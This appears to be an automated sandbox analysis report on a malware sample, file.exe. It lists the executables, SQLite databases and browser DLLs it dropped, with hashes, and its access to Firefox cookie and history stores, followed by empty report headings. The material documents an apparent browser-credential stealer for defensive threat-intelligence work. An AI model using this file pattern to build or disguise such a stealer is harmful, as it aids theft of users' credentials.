C:\ProgramData\FIJKEHJJDAAK\IEHDBG-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\FIJKEHJJDAAK\JJKJDA	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2	378391FDB591852E472D99DC4BF837DA	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
C:\ProgramData\FIJKEHJJDAAK\KECBKK	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6	933D6D14518371B212F36C3835794D75	92D056D912B3C0260D379330D3CC0359B57A322B	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
C:\ProgramData\GIEGHJEGHJKFIEBFHJKKKFHCFH	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6	933D6D14518371B212F36C3835794D75	92D056D912B3C0260D379330D3CC0359B57A322B	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
C:\ProgramData\GIEHJDHC	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	37B1FC046E4B29468721F797A2BB968D	50055EF1C50E4C1A7CCF7D00620E95128E4C448B	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
C:\ProgramData\HDHJEBFBFHJECAKFCAAK	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2	378391FDB591852E472D99DC4BF837DA	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
C:\ProgramData\JKKECBGIIIEB\AAAAKJ	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6	933D6D14518371B212F36C3835794D75	92D056D912B3C0260D379330D3CC0359B57A322B	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
C:\ProgramData\JKKFIIEB	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8	271D5F995996735B01672CF227C81C17	7AEAACD66A59314D1CBF4016038D3A0A956BAF33	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
C:\ProgramData\KECBKKEBKE.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	32C2E31313C3DF4A7A36C72503A5BEBA	1C88051112DAB0E306CADD9EE5D65F8DC229F079	F1FA2872FCD33C6DBCE8D974C0C0381C0762D46A53CEACA14A29727AD02BAEF3
C:\ProgramData\KEGIDHJKKJDGCBGCGIJK	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\KFHJJJKKFHIDAAKFBFBFCGDGDB	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	76D181A334D47872CD2E37135CC83F95	B563370B023073CE6E0F63671AA4AF169ABBF4E1	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\userGIEGHJEGHJ.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	38DABC7063C0A175A12C30BD44CF3DBC	6D7AABEBD8A417168E220C7497F4BC38C314DA3B	DE664956D799E59E1CCA0788D545922EE420E3AFDCF277442F148F52BC78DF89
C:\Users\userIJEGDBGDBF.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	32C2E31313C3DF4A7A36C72503A5BEBA	1C88051112DAB0E306CADD9EE5D65F8DC229F079	F1FA2872FCD33C6DBCE8D974C0C0381C0762D46A53CEACA14A29727AD02BAEF3
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DBGIJEHIID.exe.log	CSV text	859802284B12C59DDBB85B0AC64C08F0	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EGDGCGCFHI.exe.log	CSV text	859802284B12C59DDBB85B0AC64C08F0	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KECBKKEBKE.exe.log	CSV text	859802284B12C59DDBB85B0AC64C08F0	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\userGIEGHJEGHJ.exe.log	CSV text	859802284B12C59DDBB85B0AC64C08F0	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\userIJEGDBGDBF.exe.log	CSV text	859802284B12C59DDBB85B0AC64C08F0	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log	CSV text	859802284B12C59DDBB85B0AC64C08F0	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	F5E41B8019653F9D890F856E7042676E	2937DAD4D83DA14F8C6304277924C45004718F99	447721844CB2D6066639FDA761EC369AABC28E9CBF883F60702A09FCC9FDA51F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2ae906657_snd[1].exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	2832FBDE1CF7EA83BD6FD6A4A5E8FE15	1CED7A749D257091E0C3B75605FD3BC005E531DE	2B8BCD9D7D072FEB114E0436DC10AA80FDA52CDD46A4948EA1AE984F74898375
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2afc5abea_vasd[1].exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	38DABC7063C0A175A12C30BD44CF3DBC	6D7AABEBD8A417168E220C7497F4BC38C314DA3B	DE664956D799E59E1CCA0788D545922EE420E3AFDCF277442F148F52BC78DF89
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2b049020f_ldnf[1].exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	32C2E31313C3DF4A7A36C72503A5BEBA	1C88051112DAB0E306CADD9EE5D65F8DC229F079	F1FA2872FCD33C6DBCE8D974C0C0381C0762D46A53CEACA14A29727AD02BAEF3
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	EF8872DBB1E0DE26C4DAADB4E2BA1231	3D2931ACBF70418C2E5D997EFB92191A0AA1C370	3C3473CD478011EF47A57B88EC6FDA2427C944085BBB929BBDE6ED88BA4CD624
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\sql[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	90E744829865D57082A7F452EDC90DE5	833B178775F39675FA4E55EAB1032353514E1052	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2afc5abea_vasd[1].exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	38DABC7063C0A175A12C30BD44CF3DBC	6D7AABEBD8A417168E220C7497F4BC38C314DA3B	DE664956D799E59E1CCA0788D545922EE420E3AFDCF277442F148F52BC78DF89
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2b049020f_ldnf[1].exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	32C2E31313C3DF4A7A36C72503A5BEBA	1C88051112DAB0E306CADD9EE5D65F8DC229F079	F1FA2872FCD33C6DBCE8D974C0C0381C0762D46A53CEACA14A29727AD02BAEF3
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Temp\delays.tmp	Non-ISO extended-ASCII text, with very long lines (65536), with no line terminators	686EEA758CB79CAD5EEB31BF0629261C	BD05F54C385C95C1EF8B8015A6C30234E7982026	5D7AD056679C10C00E73E3E88358072B340EF10C7ABB7F5E20E16A55AB731D03
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by